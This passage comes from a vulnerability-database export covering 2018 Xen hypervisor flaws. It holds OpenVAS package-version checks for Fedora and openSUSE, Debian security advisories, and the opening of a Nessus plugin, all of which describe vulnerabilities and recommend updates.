script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC28\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC28\")\n{\n\n if ((res = isrpmvuln(pkg:\"xen\", rpm:\"xen~4.10.1~5.fc28\", rls:\"FC28\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-04T16:46:25", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-10981", "CVE-2018-10982", "CVE-2018-3639"], "description": "The remote host is missing an update for the ", "modified": "2020-06-03T00:00:00", "published": "2018-06-02T00:00:00", "id": "OPENVAS:1361412562310851773", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310851773", "type": "openvas", "title": "openSUSE: Security Advisory for xen (openSUSE-SU-2018:1487-1)", "sourceData": "# Copyright (C) 2018 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.851773\");\n script_version(\"2020-06-03T08:38:58+0000\");\n script_tag(name:\"last_modification\", value:\"2020-06-03 08:38:58 +0000 (Wed, 03 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-06-02 05:49:52 +0200 (Sat, 02 Jun 2018)\");\n script_cve_id(\"CVE-2018-10981\", \"CVE-2018-10982\", \"CVE-2018-3639\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"openSUSE: Security Advisory for xen (openSUSE-SU-2018:1487-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'xen'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This update for xen fixes the following issues:\n\n Security issues fixed:\n\n - CVE-2018-3639: Spectre V4 - Speculative Store Bypass aka 'Memory\n Disambiguation' (bsc#1092631)\n\n This feature can be controlled by the 'ssbd=on/off' commandline flag for\n the XEN hypervisor.\n\n - CVE-2018-10982: x86 vHPET interrupt injection errors (XSA-261\n bsc#1090822)\n\n - CVE-2018-10981: qemu may drive Xen into unbounded loop (XSA-262\n bsc#1090823)\n\n Other bugfixes:\n\n - Upstream patches from Jan (bsc#1027519)\n\n - additional fixes related to Page Table Isolation (XPTI). (bsc#1074562\n XSA-254)\n\n - qemu-system-i386 cannot handle more than 4 HW NICs (bsc#1090296)\n\n\n Patch Instructions:\n\n To install this openSUSE Security Update use the SUSE recommended\n installation methods\n like YaST online_update or 'zypper patch'.\");\n\n script_tag(name:\"affected\", value:\"xen on openSUSE Leap 42.3\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2018:1487-1\");\n script_xref(name:\"URL\", value:\"https://lists.opensuse.org/opensuse-security-announce/2018-06/msg00002.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSELeap42\\.3\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSELeap42.3\") {\n if(!isnull(res = isrpmvuln(pkg:\"xen\", rpm:\"xen~4.9.2_06~22.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen-debugsource\", rpm:\"xen-debugsource~4.9.2_06~22.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen-devel\", rpm:\"xen-devel~4.9.2_06~22.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen-doc-html\", rpm:\"xen-doc-html~4.9.2_06~22.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen-libs\", rpm:\"xen-libs~4.9.2_06~22.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen-libs-debuginfo\", rpm:\"xen-libs-debuginfo~4.9.2_06~22.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen-tools\", rpm:\"xen-tools~4.9.2_06~22.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen-tools-debuginfo\", rpm:\"xen-tools-debuginfo~4.9.2_06~22.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen-tools-domU\", rpm:\"xen-tools-domU~4.9.2_06~22.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen-tools-domU-debuginfo\", rpm:\"xen-tools-domU-debuginfo~4.9.2_06~22.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-11T16:46:48", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-10471", "CVE-2018-7540", "CVE-2017-5754", "CVE-2018-10472", "CVE-2018-7542", "CVE-2018-7541", "CVE-2018-8897"], "description": "The remote host is missing an update for the ", "modified": "2020-06-09T00:00:00", "published": "2018-05-12T00:00:00", "id": "OPENVAS:1361412562310851742", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310851742", "type": "openvas", "title": "openSUSE: Security Advisory for xen (openSUSE-SU-2018:1274-1)", "sourceData": "# Copyright (C) 2018 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.851742\");\n script_version(\"2020-06-09T14:44:58+0000\");\n script_tag(name:\"last_modification\", value:\"2020-06-09 14:44:58 +0000 (Tue, 09 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-05-12 05:51:06 +0200 (Sat, 12 May 2018)\");\n script_cve_id(\"CVE-2018-10471\", \"CVE-2018-10472\", \"CVE-2018-7540\", \"CVE-2018-7541\",\n \"CVE-2018-7542\", \"CVE-2018-8897\", \"CVE-2017-5754\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"openSUSE: Security Advisory for xen (openSUSE-SU-2018:1274-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'xen'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This update for xen to version 4.9.2 fixes several issues.\n\n This feature was added:\n\n - Added script, udev rule and systemd service to watch for vcpu\n online/offline events in a HVM domU. They are triggered via 'xl vcpu-set\n domU N'\n\n These security issues were fixed:\n\n - CVE-2018-8897: Prevent mishandling of debug exceptions on x86 (XSA-260,\n bsc#1090820)\n\n - Handle HPET timers in IO-APIC mode correctly to prevent malicious or\n buggy HVM guests from causing a hypervisor crash or potentially\n privilege escalation/information leaks (XSA-261, bsc#1090822)\n\n - Prevent unbounded loop, induced by qemu allowing an attacker to\n permanently keep a physical CPU core busy (XSA-262, bsc#1090823)\n\n - CVE-2018-10472: x86 HVM guest OS users (in certain configurations) were\n able to read arbitrary dom0 files via QMP live insertion of a CDROM, in\n conjunction with specifying the target file as the backing file of a\n snapshot (bsc#1089152).\n\n - CVE-2018-10471: x86 PV guest OS users were able to cause a denial of\n service (out-of-bounds zero write and hypervisor crash) via unexpected\n INT 80 processing, because of an incorrect fix for CVE-2017-5754\n (bsc#1089635).\n\n - CVE-2018-7540: x86 PV guest OS users were able to cause a denial of\n service (host OS CPU hang) via non-preemptible L3/L4 pagetable freeing\n (bsc#1080635).\n\n - CVE-2018-7541: Guest OS users were able to cause a denial of service\n (hypervisor crash) or gain privileges by triggering a grant-table\n transition from v2 to v1 (bsc#1080662).\n\n - CVE-2018-7542: x86 PVH guest OS users were able to cause a denial of\n service (NULL pointer dereference and hypervisor crash) by leveraging\n the mishandling\n of configurations that lack a Local APIC (bsc#1080634).\n\n These non-security issues were fixed:\n\n - bsc#1087252: Update built-in defaults for xenstored in stubdom, keep\n default to run xenstored as daemon in dom0\n\n - bsc#1087251: Preserve xen-syms from xen-dbg.gz to allow processing\n vmcores with crash(1)\n\n - bsc#1072834: Prevent unchecked MSR access error\n\n This update was imported from the SUSE:SLE-12-SP3:Update update project.\n\n Patch Instructions:\n\n To install this openSUSE Security Update use the SUSE recommended\n installation methods\n like YaST online_update or 'zypper patch'.\n\n Alternatively you can run the command listed for your product:\n\n - openSUSE Leap 42.3:\n\n zypper in -t patch openSUSE-2018-454=1\");\n\n script_tag(name:\"affected\", value:\"xen on openSUSE Leap 42.3\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2018:1274-1\");\n script_xref(name:\"URL\", value:\"https://lists.opensuse.org/opensuse-security-announce/2018-05/msg00059.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSELeap42\\.3\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSELeap42.3\") {\n if(!isnull(res = isrpmvuln(pkg:\"xen\", rpm:\"xen~4.9.2_04~19.2\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen-debugsource\", rpm:\"xen-debugsource~4.9.2_04~19.2\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen-devel\", rpm:\"xen-devel~4.9.2_04~19.2\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen-doc-html\", rpm:\"xen-doc-html~4.9.2_04~19.2\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen-libs\", rpm:\"xen-libs~4.9.2_04~19.2\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen-libs-debuginfo\", rpm:\"xen-libs-debuginfo~4.9.2_04~19.2\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen-tools\", rpm:\"xen-tools~4.9.2_04~19.2\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen-tools-debuginfo\", rpm:\"xen-tools-debuginfo~4.9.2_04~19.2\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen-tools-domU\", rpm:\"xen-tools-domU~4.9.2_04~19.2\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen-tools-domU-debuginfo\", rpm:\"xen-tools-domU-debuginfo~4.9.2_04~19.2\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:32:55", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-10471", "CVE-2018-10472", "CVE-2018-15468", "CVE-2018-10981", "CVE-2018-12892", "CVE-2018-15470", "CVE-2018-3646", "CVE-2018-12893", "CVE-2018-3620", "CVE-2018-3665", "CVE-2018-15469", "CVE-2018-8897", "CVE-2018-10982", "CVE-2018-12891", "CVE-2018-3639"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2018-08-30T00:00:00", "id": "OPENVAS:1361412562310875010", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310875010", "type": "openvas", "title": "Fedora Update for xen FEDORA-2018-683dfde81a", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2018_683dfde81a_xen_fc28.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for xen FEDORA-2018-683dfde81a\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.875010\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-08-30 07:24:42 +0200 (Thu, 30 Aug 2018)\");\n script_cve_id(\"CVE-2018-3620\", \"CVE-2018-3646\", \"CVE-2018-12891\", \"CVE-2018-12893\",\n \"CVE-2018-12892\", \"CVE-2018-3665\", \"CVE-2018-3639\", \"CVE-2018-8897\",\n \"CVE-2018-10982\", \"CVE-2018-10981\", \"CVE-2018-10472\", \"CVE-2018-10471\",\n \"CVE-2018-15469\", \"CVE-2018-15468\", \"CVE-2018-15470\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for xen FEDORA-2018-683dfde81a\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'xen'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\non the target host.\");\n script_tag(name:\"affected\", value:\"xen on Fedora 28\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n\n script_xref(name:\"FEDORA\", value:\"2018-683dfde81a\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/GOBWAAGQGXLQJKTEI5JYA4HQNK4EI4XY\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC28\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC28\")\n{\n\n if ((res = isrpmvuln(pkg:\"xen\", rpm:\"xen~4.10.1~6.fc28\", rls:\"FC28\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:32:56", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-10471", "CVE-2018-10472", "CVE-2018-15468", "CVE-2018-10981", "CVE-2018-12892", "CVE-2018-15470", "CVE-2018-3646", "CVE-2018-12893", "CVE-2018-18883", "CVE-2018-3620", "CVE-2018-3665", "CVE-2018-15469", "CVE-2018-8897", "CVE-2018-10982", "CVE-2018-12891", "CVE-2018-3639"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2018-11-12T00:00:00", "id": "OPENVAS:1361412562310875255", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310875255", "type": "openvas", "title": "Fedora Update for xen FEDORA-2018-73dd8de892", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2018_73dd8de892_xen_fc28.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for xen FEDORA-2018-73dd8de892\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.875255\");\n script_version(\"$Revision: 14223 $\");\n script_cve_id(\"CVE-2018-3620\", \"CVE-2018-3646\", \"CVE-2018-15469\", \"CVE-2018-15468\", \"CVE-2018-15470\", \"CVE-2018-12891\", \"CVE-2018-12893\", \"CVE-2018-12892\", \"CVE-2018-3665\", \"CVE-2018-3639\", \"CVE-2018-8897\", \"CVE-2018-10982\", \"CVE-2018-10981\", \"CVE-2018-10472\", \"CVE-2018-10471\", \"CVE-2018-18883\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-11-12 06:20:33 +0100 (Mon, 12 Nov 2018)\");\n script_name(\"Fedora Update for xen FEDORA-2018-73dd8de892\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC28\");\n\n script_xref(name:\"FEDORA\", value:\"2018-73dd8de892\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/N4MA4UUBF3E5HSEL3AI2HU7ITV2Z4YKI\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'xen'\n package(s) announced via the FEDORA-2018-73dd8de892 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"affected\", value:\"xen on Fedora 28.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC28\")\n{\n\n if ((res = isrpmvuln(pkg:\"xen\", rpm:\"xen~4.10.2~2.fc28\", rls:\"FC28\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "debian": [{"lastseen": "2020-09-12T01:03:47", "bulletinFamily": "unix", "cvelist": ["CVE-2018-10471", "CVE-2018-10472", "CVE-2018-10981", "CVE-2018-8897", "CVE-2018-10982"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-4201-1 security@debian.org\nhttps://www.debian.org/security/ Moritz Muehlenhoff\nMay 15, 2018 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : xen\nCVE ID : CVE-2018-8897 CVE-2018-10471 CVE-2018-10472 CVE-2018-10981 \n CVE-2018-10982\n\nMultiple vulnerabilities have been discovered in the Xen hypervisor:\n\nCVE-2018-8897\n\n Andy Lutomirski and Nick Peterson discovered that incorrect handling\n of debug exceptions could result in privilege escalation.\n\nCVE-2018-10471\n\n An error was discovered in the mitigations against Meltdown which\n could result in denial of service.\n\nCVE-2018-10472\n\n Anthony Perard discovered that incorrect parsing of CDROM images\n can result in information disclosure.\n\nCVE-2018-10981\n\n Jan Beulich discovered that malformed device models could result\n in denial of service.\n\nCVE-2018-10982\n\n Roger Pau Monne discovered that incorrect handling of high precision\n event timers could result in denial of service and potentially\n privilege escalation.\n\nFor the stable distribution (stretch), these problems have been fixed in\nversion 4.8.3+comet2+shim4.10.0+comet3-1+deb9u6.\n\nWe recommend that you upgrade your xen packages.\n\nFor the detailed security status of xen please refer to\nits security tracker page at:\nhttps://security-tracker.debian.org/tracker/xen\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 8, "modified": "2018-05-15T20:04:28", "published": "2018-05-15T20:04:28", "id": "DEBIAN:DSA-4201-1:7E613", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2018/msg00128.html", "title": "[SECURITY] [DSA 4201-1] xen security update", "type": "debian", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-30T02:22:24", "bulletinFamily": "unix", "cvelist": ["CVE-2018-10981", "CVE-2018-8897", "CVE-2018-10982"], "description": "Package : xen\nVersion : 4.1.6.lts1-14\nCVE ID : CVE-2018-8897 CVE-2018-10981 CVE-2018-10982\n\nMultiple vulnerabilities have been discovered in the Xen hypervisor, which\ncould result in denial of service, informations leaks or privilege\nescalation.\n\nFor Debian 7 &quot;Wheezy&quot;, these problems have been fixed in version\n4.1.6.lts1-14.\n\nWe recommend that you upgrade your xen packages.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS\n", "edition": 3, "modified": "2018-05-25T11:26:24", "published": "2018-05-25T11:26:24", "id": "DEBIAN:DLA-1383-1:AD0A7", "href": "https://lists.debian.org/debian-lts-announce/2018/debian-lts-announce-201805/msg00015.html", "title": "[SECURITY] [DLA 1383-1] xen security update", "type": "debian", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-08-12T00:59:58", "bulletinFamily": "unix", "cvelist": ["CVE-2018-10472", "CVE-2018-10981", "CVE-2017-15592", "CVE-2017-17045", "CVE-2017-17044", "CVE-2017-15593", "CVE-2017-15594", "CVE-2017-15595"], "description": "Package : xen\nVersion : 4.4.4lts3-0+deb8u1\nCVE ID : CVE-2017-15592 CVE-2017-15593 CVE-2017-15594 CVE-2017-15595 \n CVE-2017-17044 CVE-2017-17045 CVE-2018-10472 CVE-2018-10981\n\nMultiple vulnerabilities have been discovered in the Xen hypervisor, which\ncould result in denial of service, informations leaks or privilege\nescalation.\n\nFor Debian 8 &quot;Jessie&quot;, these problems have been fixed in version\n4.4.4lts3-0+deb8u1.\n\nWe recommend that you upgrade your xen packages.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS\n", "edition": 8, "modified": "2018-10-30T07:46:55", "published": "2018-10-30T07:46:55", "id": "DEBIAN:DLA-1559-1:6EBBD", "href": "https://lists.debian.org/debian-lts-announce/2018/debian-lts-announce-201810/msg00021.html", "title": "[SECURITY] [DLA 1559-1] xen security update", "type": "debian", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2021-02-01T01:52:33", "description": "Multiple vulnerabilities have been discovered in the Xen hypervisor :\n\n - CVE-2018-8897\n Andy Lutomirski and Nick Peterson discovered that\n incorrect handling of debug exceptions could result in\n privilege escalation.\n\n - CVE-2018-10471\n An error was discovered in the mitigations against\n Meltdown which could result in denial of service.\n\n - CVE-2018-10472\n Anthony Perard discovered that incorrect parsing of\n CDROM images can result in information disclosure.\n\n - CVE-2018-10981\n Jan Beulich discovered that malformed device models\n could result in denial of service.\n\n - CVE-2018-10982\n Roger Pau Monne discovered that incorrect handling of\n high precision event timers could result in denial of\n service and potentially privilege escalation.", "edition": 32, "cvss3": {"score": 8.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"}, "published": "2018-05-16T00:00:00", "title": "Debian DSA-4201-1 : xen - security update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-10471", "CVE-2018-10472", "CVE-2018-10981", "CVE-2018-8897", "CVE-2018-10982"], "modified": "2021-02-02T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:xen", "cpe:/o:debian:debian_linux:9.0"], "id": "DEBIAN_DSA-4201.NASL", "href": "https://www.tenable.com/plugins/nessus/109816", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-4201. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(109816);\n script_version(\"1.13\");\n script_cvs_date(\"Date: 2019/04/05 23:25:05\");\n\n script_cve_id(\"CVE-2018-10471\", \"CVE-2018-10472\", \"CVE-2018-10981\", \"CVE-2018-10982\", \"CVE-2018-8897\");\n script_xref(name:\"DSA\", value:\"4201\");\n\n script_name(english:\"Debian DSA-4201-1 : xen - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Multiple vulnerabilities have been discovered in the Xen hypervisor :\n\n - CVE-2018-8897\n Andy Lutomirski and Nick Peterson discovered that\n incorrect handling of debug exceptions could result in\n privilege escalation.\n\n - CVE-2018-10471\n An error was discovered in the mitigations against\n Meltdown which could result in denial of service.\n\n - CVE-2018-10472\n Anthony Perard discovered that incorrect parsing of\n CDROM images can result in information disclosure.\n\n - CVE-2018-10981\n Jan Beulich discovered that malformed device models\n could result in denial of service.\n\n - CVE-2018-10982\n Roger Pau Monne discovered that incorrect handling of\n high precision event timers could result in denial of\n service and potentially privilege escalation.\"\n );\n 